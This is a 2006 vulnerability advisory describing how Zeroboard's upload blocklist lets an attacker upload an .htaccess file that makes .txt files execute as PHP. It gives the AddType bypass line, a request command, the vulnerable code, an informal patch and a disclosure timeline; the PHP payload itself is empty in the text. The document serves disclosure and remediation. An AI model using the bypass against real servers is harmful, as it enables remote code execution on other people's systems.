|
|
Zeroboard File Upload & extension bypass Vulnerability =0D
=0D
Author : Choi Min-sung (mins __at__ wins21.com)=0D
Product : Zeroboard http://www.nzeo.com=0D
Verndor-Patches : Unpatched=0D
Impact : remote code execution=0D
=0D
=0D
=0D
Summary=0D
========0D
=0D
Basically, the PHP, HTML, and CGI files are prohibited to upload in Zeroboard. But uploading of the other files which can =0D
=0D
modify the configuration of Apache such as .htaccess is not considered as a serious issue. Therefore, an unknown attacker can =0D
=0D
execute any malicious codes on the system and acquire system control also.=0D
=0D
=0D
Affected Products=0D
==================0D
=0D
* The FileType in the .htaccess can be modified by configuring the Override FileInfo or OverrideAll in the httpd.conf of =0D
=0D
Apache. =0D
* Zeroboeard4.1pl8 or earlier =0D
=0D
=0D
Details=0D
========0D
=0D
Zeroboard basically prohibits uploading execution scripts such as php, html, cgi, and asp. =0D
=0D
write_ok.php =0D
------------=0D
// Upload prohibited =0D
if($file1_size>0) { =0D
$s_file_name1=$file1_name; =0D
if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)=0D
=0D
||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi ("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)=0D
=0D
||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded."); =0D
=0D
=0D
: But the above codes cannot block the upload of files such as .htaccess and etc. =0D
=0D
=0D
The Process of an Actual Attack =0D
=============================== =0D
- Attack Scenario =0D
=0D
1. A malicious user uploads a following '.htaccess' file. =0D
=0D
.htaccess =0D
--------- =0D
AddType application/x-httpd-php .php .php3 .php4 .htm .html .txt =0D
=0D
2. A malicious user uploads a following .txt file. =0D
test.txt =0D
-------- =0D
=0D
=0D
3. The PHP script is executed, because the .txt file is modified to execute the PHP script. =0D
=0D
$ lynx --dump http://hackme/zb41pl7/bbs/data/test/test.txt =0D
=0D
=0D
Solution=0D
=========0D
=0D
Below is an informal patch that I made. =0D
Vendor Proceed -> Unpatched =0D
=0D
write_ok.php.patch =0D
------------------ =0D
--- write_ok.php.org 2005-09-01 19:22:17.000000000 +0900 =0D
+++ write_ok.php 2005-09-01 19:22:27.000000000 +0900 =0D
@@ -208,7 +208,7 @@ =0D
=0D
// Upload prohibited =0D
if($file1_size>0) { =0D
$s_file_name1=$file1_name; =0D
- if(eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)=0D
=0D
||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)=0D
=0D
||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The HTML and PHP related files cannot be uploaded."); =0D
=0D
+ if(preg_match("/^\./",$s_file_name1)||eregi("\.inc",$s_file_name1)||eregi("\.phtm",$s_file_name1)||eregi=0D
=0D
("\.htm",$s_file_name1)||eregi("\.shtm",$s_file_name1)||eregi("\.ztx",$s_file_name1)||eregi("\.php",$s_file_name1)||eregi=0D
=0D
("\.dot",$s_file_name1)||eregi("\.asp",$s_file_name1)||eregi("\.cgi",$s_file_name1)||eregi("\.pl",$s_file_name1)) Error("The =0D
=0D
HTML and PHP related files cannot be uploaded."); =0D
=0D
//Check extension =0D
if($setup[pds_ext1]) { =0D
=0D
=0D
Timeline=0D
=========0D
01/09/2005 Initial vendor notification. I made Temporary Patch.=0D
02/09/2005 Vendor confirms vulnerability.=0D
15/03/2006 Released Patch 4.1pl8 (NOT PATCHED THIS VULNERABILITY)=0D
12/06/2006 Vulnerability reported to KISA (Korea Infomation Security Agency) KRCert=0D
12/06/2006 Final Vendor Contact.=0D
12/06/2006 Secunia notified of this vulnerability.=0D
16/06/2006 Public disclosure.=0D
=0D
Credits =0D
========0D
Discovered by Choi Min-sung, WINSTechnet CERT=0D
=0D
=0D
Reference Site =0D
===============0D
http://securecast.wins21.com/zerovul.html=0D
http://securecast.wins21.com/offer/offer_database_view.asp?code=WE06-0391 =0D